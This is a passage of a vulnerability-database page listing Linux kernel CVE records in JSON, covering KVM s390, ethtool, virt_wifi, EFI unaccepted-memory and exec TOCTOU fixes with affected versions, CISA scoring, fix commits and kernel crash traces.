"version": "27e0393f15fc8bc855c6a888387ff5ffd2181089",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"Documentation/virt/kvm/api.rst",
"arch/s390/kvm/kvm-s390.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.4"
},
{
"lessThan": "3.4",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"versionStartIncluding": "3.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "3.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nkvm: s390: Reject memory region operations for ucontrol VMs\n\nThis change rejects the KVM_SET_USER_MEMORY_REGION and\nKVM_SET_USER_MEMORY_REGION2 ioctls when called on a ucontrol VM.\nThis is necessary since ucontrol VMs have kvm-\u003earch.gmap set to 0 and\nwould thus result in a null pointer dereference further in.\nMemory management needs to be performed in userspace and using the\nioctls KVM_S390_UCAS_MAP and KVM_S390_UCAS_UNMAP.\n\nAlso improve s390 specific documentation for KVM_SET_USER_MEMORY_REGION\nand KVM_SET_USER_MEMORY_REGION2.\n\n[frankja@linux.ibm.com: commit message spelling fix, subject prefix fix]"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:26:58.133Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/49c9945c054df4c22008e2bf87ca74d3e2507aa6"
},
{
"url": "https://git.kernel.org/stable/c/7816e58967d0e6cadce05c8540b47ed027dc2499"
}
],
"title": "kvm: s390: Reject memory region operations for ucontrol VMs",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-43819",
"datePublished": "2024-08-17T09:21:40.994Z",
"dateReserved": "2024-08-17T09:11:59.271Z",
"dateUpdated": "2025-05-04T09:26:58.133Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-47517 (GCVE-0-2021-47517)
Vulnerability from cvelistv5
Published
2024-05-24 15:09
Modified
2025-05-04 07:12
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ethtool: do not perform operations on net devices being unregistered
There is a short period between a net device starts to be unregistered
and when it is actually gone. In that time frame ethtool operations
could still be performed, which might end up in unwanted or undefined
behaviours[1].
Do not allow ethtool operations after a net device starts its
unregistration. This patch targets the netlink part as the ioctl one
isn't affected: the reference to the net device is taken and the
operation is executed within an rtnl lock section and the net device
won't be found after unregister.
[1] For example adding Tx queues after unregister ends up in NULL
pointer exceptions and UaFs, such as:
BUG: KASAN: use-after-free in kobject_get+0x14/0x90
Read of size 1 at addr ffff88801961248c by task ethtool/755
CPU: 0 PID: 755 Comm: ethtool Not tainted 5.15.0-rc6+ #778
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-4.fc34 04/014
Call Trace:
dump_stack_lvl+0x57/0x72
print_address_description.constprop.0+0x1f/0x140
kasan_report.cold+0x7f/0x11b
kobject_get+0x14/0x90
kobject_add_internal+0x3d1/0x450
kobject_init_and_add+0xba/0xf0
netdev_queue_update_kobjects+0xcf/0x200
netif_set_real_num_tx_queues+0xb4/0x310
veth_set_channels+0x1c3/0x550
ethnl_set_channels+0x524/0x610
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2021-47517",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-24T19:18:28.551288Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:13:57.373Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-04T05:39:59.610Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7c26da3be1e9843a15b5318f90db8a564479d2ac"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cfd719f04267108f5f5bf802b9d7de69e99a99f9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/dde91ccfa25fd58f64c397d91b81a4b393100ffa"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/ethtool/netlink.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "7c26da3be1e9843a15b5318f90db8a564479d2ac",
"status": "affected",
"version": "041b1c5d4a53e97fc9e029ae32469552ca12cb9b",
"versionType": "git"
},
{
"lessThan": "cfd719f04267108f5f5bf802b9d7de69e99a99f9",
"status": "affected",
"version": "041b1c5d4a53e97fc9e029ae32469552ca12cb9b",
"versionType": "git"
},
{
"lessThan": "dde91ccfa25fd58f64c397d91b81a4b393100ffa",
"status": "affected",
"version": "041b1c5d4a53e97fc9e029ae32469552ca12cb9b",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/ethtool/netlink.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.6"
},
{
"lessThan": "5.6",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.87",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.8",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "5.16",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.87",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.8",
"versionStartIncluding": "5.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.16",
"versionStartIncluding": "5.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nethtool: do not perform operations on net devices being unregistered\n\nThere is a short period between a net device starts to be unregistered\nand when it is actually gone. In that time frame ethtool operations\ncould still be performed, which might end up in unwanted or undefined\nbehaviours[1].\n\nDo not allow ethtool operations after a net device starts its\nunregistration. This patch targets the netlink part as the ioctl one\nisn\u0027t affected: the reference to the net device is taken and the\noperation is executed within an rtnl lock section and the net device\nwon\u0027t be found after unregister.\n\n[1] For example adding Tx queues after unregister ends up in NULL\n pointer exceptions and UaFs, such as:\n\n BUG: KASAN: use-after-free in kobject_get+0x14/0x90\n Read of size 1 at addr ffff88801961248c by task ethtool/755\n\n CPU: 0 PID: 755 Comm: ethtool Not tainted 5.15.0-rc6+ #778\n Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-4.fc34 04/014\n Call Trace:\n dump_stack_lvl+0x57/0x72\n print_address_description.constprop.0+0x1f/0x140\n kasan_report.cold+0x7f/0x11b\n kobject_get+0x14/0x90\n kobject_add_internal+0x3d1/0x450\n kobject_init_and_add+0xba/0xf0\n netdev_queue_update_kobjects+0xcf/0x200\n netif_set_real_num_tx_queues+0xb4/0x310\n veth_set_channels+0x1c3/0x550\n ethnl_set_channels+0x524/0x610"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:12:41.633Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/7c26da3be1e9843a15b5318f90db8a564479d2ac"
},
{
"url": "https://git.kernel.org/stable/c/cfd719f04267108f5f5bf802b9d7de69e99a99f9"
},
{
"url": "https://git.kernel.org/stable/c/dde91ccfa25fd58f64c397d91b81a4b393100ffa"
}
],
"title": "ethtool: do not perform operations on net devices being unregistered",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2021-47517",
"datePublished": "2024-05-24T15:09:30.675Z",
"dateReserved": "2024-05-24T15:02:54.824Z",
"dateUpdated": "2025-05-04T07:12:41.633Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43841 (GCVE-0-2024-43841)
Vulnerability from cvelistv5
Published
2024-08-17 09:21
Modified
2025-05-04 09:27
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
wifi: virt_wifi: avoid reporting connection success with wrong SSID
When user issues a connection with a different SSID than the one
virt_wifi has advertised, the __cfg80211_connect_result() will
trigger the warning: WARN_ON(bss_not_found).
The issue is because the connection code in virt_wifi does not
check the SSID from user space (it only checks the BSSID), and
virt_wifi will call cfg80211_connect_result() with WLAN_STATUS_SUCCESS
even if the SSID is different from the one virt_wifi has advertised.
Eventually cfg80211 won't be able to find the cfg80211_bss and generate
the warning.
Fixed it by checking the SSID (from user space) in the connection code.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: c7cdba31ed8b87526db978976392802d3f93110c Version: c7cdba31ed8b87526db978976392802d3f93110c Version: c7cdba31ed8b87526db978976392802d3f93110c Version: c7cdba31ed8b87526db978976392802d3f93110c Version: c7cdba31ed8b87526db978976392802d3f93110c Version: c7cdba31ed8b87526db978976392802d3f93110c Version: c7cdba31ed8b87526db978976392802d3f93110c |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-43841",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:07:55.756844Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-12T17:33:22.634Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/net/wireless/virtual/virt_wifi.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "994fc2164a03200c3bf42fb45b3d49d9d6d33a4d",
"status": "affected",
"version": "c7cdba31ed8b87526db978976392802d3f93110c",
"versionType": "git"
},
{
"lessThan": "05c4488a0e446c6ccde9f22b573950665e1cd414",
"status": "affected",
"version": "c7cdba31ed8b87526db978976392802d3f93110c",
"versionType": "git"
},
{
"lessThan": "93e898a264b4e0a475552ba9f99a016eb43ef942",
"status": "affected",
"version": "c7cdba31ed8b87526db978976392802d3f93110c",
"versionType": "git"
},
{
"lessThan": "d3cc85a10abc8eae48988336cdd3689ab92581b3",
"status": "affected",
"version": "c7cdba31ed8b87526db978976392802d3f93110c",
"versionType": "git"
},
{
"lessThan": "36e92b5edc8e0daa18e9325674313802ce3fbc29",
"status": "affected",
"version": "c7cdba31ed8b87526db978976392802d3f93110c",
"versionType": "git"
},
{
"lessThan": "416d3c1538df005195721a200b0371d39636e05d",
"status": "affected",
"version": "c7cdba31ed8b87526db978976392802d3f93110c",
"versionType": "git"
},
{
"lessThan": "b5d14b0c6716fad7f0c94ac6e1d6f60a49f985c7",
"status": "affected",
"version": "c7cdba31ed8b87526db978976392802d3f93110c",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/net/wireless/virtual/virt_wifi.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.0"
},
{
"lessThan": "5.0",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.282",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.224",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.165",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.103",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.44",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.10.*",
"status": "unaffected",
"version": "6.10.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.11",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.282",
"versionStartIncluding": "5.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.224",
"versionStartIncluding": "5.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.165",
"versionStartIncluding": "5.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.103",
"versionStartIncluding": "5.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.44",
"versionStartIncluding": "5.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.10.3",
"versionStartIncluding": "5.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.11",
"versionStartIncluding": "5.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: virt_wifi: avoid reporting connection success with wrong SSID\n\nWhen user issues a connection with a different SSID than the one\nvirt_wifi has advertised, the __cfg80211_connect_result() will\ntrigger the warning: WARN_ON(bss_not_found).\n\nThe issue is because the connection code in virt_wifi does not\ncheck the SSID from user space (it only checks the BSSID), and\nvirt_wifi will call cfg80211_connect_result() with WLAN_STATUS_SUCCESS\neven if the SSID is different from the one virt_wifi has advertised.\nEventually cfg80211 won\u0027t be able to find the cfg80211_bss and generate\nthe warning.\n\nFixed it by checking the SSID (from user space) in the connection code."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:27:27.720Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/994fc2164a03200c3bf42fb45b3d49d9d6d33a4d"
},
{
"url": "https://git.kernel.org/stable/c/05c4488a0e446c6ccde9f22b573950665e1cd414"
},
{
"url": "https://git.kernel.org/stable/c/93e898a264b4e0a475552ba9f99a016eb43ef942"
},
{
"url": "https://git.kernel.org/stable/c/d3cc85a10abc8eae48988336cdd3689ab92581b3"
},
{
"url": "https://git.kernel.org/stable/c/36e92b5edc8e0daa18e9325674313802ce3fbc29"
},
{
"url": "https://git.kernel.org/stable/c/416d3c1538df005195721a200b0371d39636e05d"
},
{
"url": "https://git.kernel.org/stable/c/b5d14b0c6716fad7f0c94ac6e1d6f60a49f985c7"
}
],
"title": "wifi: virt_wifi: avoid reporting connection success with wrong SSID",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-43841",
"datePublished": "2024-08-17T09:21:56.517Z",
"dateReserved": "2024-08-17T09:11:59.274Z",
"dateUpdated": "2025-05-04T09:27:27.720Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-36936 (GCVE-0-2024-36936)
Vulnerability from cvelistv5
Published
2024-05-30 15:29
Modified
2025-05-04 12:56
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
efi/unaccepted: touch soft lockup during memory accept
Commit 50e782a86c98 ("efi/unaccepted: Fix soft lockups caused by
parallel memory acceptance") has released the spinlock so other CPUs can
do memory acceptance in parallel and not triggers softlockup on other
CPUs.
However the softlock up was intermittent shown up if the memory of the
TD guest is large, and the timeout of softlockup is set to 1 second:
RIP: 0010:_raw_spin_unlock_irqrestore
Call Trace:
? __hrtimer_run_queues
<IRQ>
? hrtimer_interrupt
? watchdog_timer_fn
? __sysvec_apic_timer_interrupt
? __pfx_watchdog_timer_fn
? sysvec_apic_timer_interrupt
</IRQ>
? __hrtimer_run_queues
<TASK>
? hrtimer_interrupt
? asm_sysvec_apic_timer_interrupt
? _raw_spin_unlock_irqrestore
? __sysvec_apic_timer_interrupt
? sysvec_apic_timer_interrupt
accept_memory
try_to_accept_memory
do_huge_pmd_anonymous_page
get_page_from_freelist
__handle_mm_fault
__alloc_pages
__folio_alloc
? __tdx_hypercall
handle_mm_fault
vma_alloc_folio
do_user_addr_fault
do_huge_pmd_anonymous_page
exc_page_fault
? __do_huge_pmd_anonymous_page
asm_exc_page_fault
__handle_mm_fault
When the local irq is enabled at the end of accept_memory(), the
softlockup detects that the watchdog on single CPU has not been fed for
a while. That is to say, even other CPUs will not be blocked by
spinlock, the current CPU might be stunk with local irq disabled for a
while, which hurts not only nmi watchdog but also softlockup.
Chao Gao pointed out that the memory accept could be time costly and
there was similar report before. Thus to avoid any softlocup detection
during this stage, give the softlockup a flag to skip the timeout check
at the end of accept_memory(), by invoking touch_softlockup_watchdog().
References
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-36936",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-12T19:14:06.800588Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-12T19:14:21.422Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:43:50.123Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/781e34b736014188ba9e46a71535237313dcda81"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1c5a1627f48105cbab81d25ec2f72232bfaa8185"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/firmware/efi/unaccepted_memory.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "e115c1b5de55a105c75aba8eb08301c075fa4ef4",
"status": "affected",
"version": "50e782a86c980d4f8292ef82ed8139282ca07a98",
"versionType": "git"
},
{
"lessThan": "781e34b736014188ba9e46a71535237313dcda81",
"status": "affected",
"version": "50e782a86c980d4f8292ef82ed8139282ca07a98",
"versionType": "git"
},
{
"lessThan": "1c5a1627f48105cbab81d25ec2f72232bfaa8185",
"status": "affected",
"version": "50e782a86c980d4f8292ef82ed8139282ca07a98",
"versionType": "git"
},
{
"status": "affected",
"version": "b583bfcc5a36dbd1db1984dbfcfd23ba64d23604",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/firmware/efi/unaccepted_memory.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.6"
},
{
"lessThan": "6.6",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.55",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.10",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.55",
"versionStartIncluding": "6.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.10",
"versionStartIncluding": "6.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "6.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.5.9",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nefi/unaccepted: touch soft lockup during memory accept\n\nCommit 50e782a86c98 (\"efi/unaccepted: Fix soft lockups caused by\nparallel memory acceptance\") has released the spinlock so other CPUs can\ndo memory acceptance in parallel and not triggers softlockup on other\nCPUs.\n\nHowever the softlock up was intermittent shown up if the memory of the\nTD guest is large, and the timeout of softlockup is set to 1 second:\n\n RIP: 0010:_raw_spin_unlock_irqrestore\n Call Trace:\n ? __hrtimer_run_queues\n \u003cIRQ\u003e\n ? hrtimer_interrupt\n ? watchdog_timer_fn\n ? __sysvec_apic_timer_interrupt\n ? __pfx_watchdog_timer_fn\n ? sysvec_apic_timer_interrupt\n \u003c/IRQ\u003e\n ? __hrtimer_run_queues\n \u003cTASK\u003e\n ? hrtimer_interrupt\n ? asm_sysvec_apic_timer_interrupt\n ? _raw_spin_unlock_irqrestore\n ? __sysvec_apic_timer_interrupt\n ? sysvec_apic_timer_interrupt\n accept_memory\n try_to_accept_memory\n do_huge_pmd_anonymous_page\n get_page_from_freelist\n __handle_mm_fault\n __alloc_pages\n __folio_alloc\n ? __tdx_hypercall\n handle_mm_fault\n vma_alloc_folio\n do_user_addr_fault\n do_huge_pmd_anonymous_page\n exc_page_fault\n ? __do_huge_pmd_anonymous_page\n asm_exc_page_fault\n __handle_mm_fault\n\nWhen the local irq is enabled at the end of accept_memory(), the\nsoftlockup detects that the watchdog on single CPU has not been fed for\na while. That is to say, even other CPUs will not be blocked by\nspinlock, the current CPU might be stunk with local irq disabled for a\nwhile, which hurts not only nmi watchdog but also softlockup.\n\nChao Gao pointed out that the memory accept could be time costly and\nthere was similar report before. Thus to avoid any softlocup detection\nduring this stage, give the softlockup a flag to skip the timeout check\nat the end of accept_memory(), by invoking touch_softlockup_watchdog()."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:56:32.357Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/e115c1b5de55a105c75aba8eb08301c075fa4ef4"
},
{
"url": "https://git.kernel.org/stable/c/781e34b736014188ba9e46a71535237313dcda81"
},
{
"url": "https://git.kernel.org/stable/c/1c5a1627f48105cbab81d25ec2f72232bfaa8185"
}
],
"title": "efi/unaccepted: touch soft lockup during memory accept",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-36936",
"datePublished": "2024-05-30T15:29:25.767Z",
"dateReserved": "2024-05-30T15:25:07.071Z",
"dateUpdated": "2025-05-04T12:56:32.357Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-43882 (GCVE-0-2024-43882)
Vulnerability from cvelistv5
Published
2024-08-21 00:10
Modified
2025-05-04 09:28
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
exec: Fix ToCToU between perm check and set-uid/gid usage
When opening a file for exec via do_filp_open(), permission checking is
done against the file's metadata at that moment, and on success, a file
pointer is passed back. Much later in the execve() code path, the file
metadata (specifically mode, uid, and gid) is used to determine if/how
to set the uid and gid. However, those values may have changed since the
permissions check, meaning the execution may gain unintended privileges.
For example, if a file could change permissions from executable and not
set-id:
---------x 1 root root 16048 Aug 7 13:16 target
to set-id and non-executable:
---S------ 1 root root 16048 Aug 7 13:16 target
it is possible to gain root privileges when execution should have been
disallowed.
While this race condition is rare in real-world scenarios, it has been
observed (and proven exploitable) when package managers are updating
the setuid bits of installed programs. Such files start with being
world-executable but then are adjusted to be group-exec with a set-uid
bit. For example, "chmod o-x,u+s target" makes "target" executable only
by uid "root" and gid "cdrom", while also becoming setuid-root:
-rwxr-xr-x 1 root cdrom 16048 Aug 7 13:16 target
becomes:
-rwsr-xr-- 1 root cdrom 16048 Aug 7 13:16 target
But racing the chmod means users without group "cdrom" membership can
get the permission to execute "target" just before the chmod, and when
the chmod finishes, the exec reaches brpm_fill_uid(), and performs the
setuid to root, violating the expressed authorization of "only cdrom
group members can setuid to root".
Re-check that we still have execute permissions in case the metadata
has changed. It would be better to keep a copy from the perm-check time,
but until we can do that refactoring, the least-bad option is to do a
full inode_permission() call (under inode lock). It is understood that
this is safe against dead-locks, but hardly optimal.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 Version: 1da177e4c3f41524e886b7f1b8a0c1fc7321cac2 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 8.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-43882",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-12-10T04:55:56.573367Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-367",
"description": "CWE-367 Time-of-check Time-of-use (TOCTOU) Race Condition",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-12-10T18:58:31.805Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/exec.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "d5c3c7e26275a2d83b894d30f7582a42853a958f",
"status": "affected",
"version": "1da177e4c3f41524e886b7f1b8a0c1fc7321cac2",
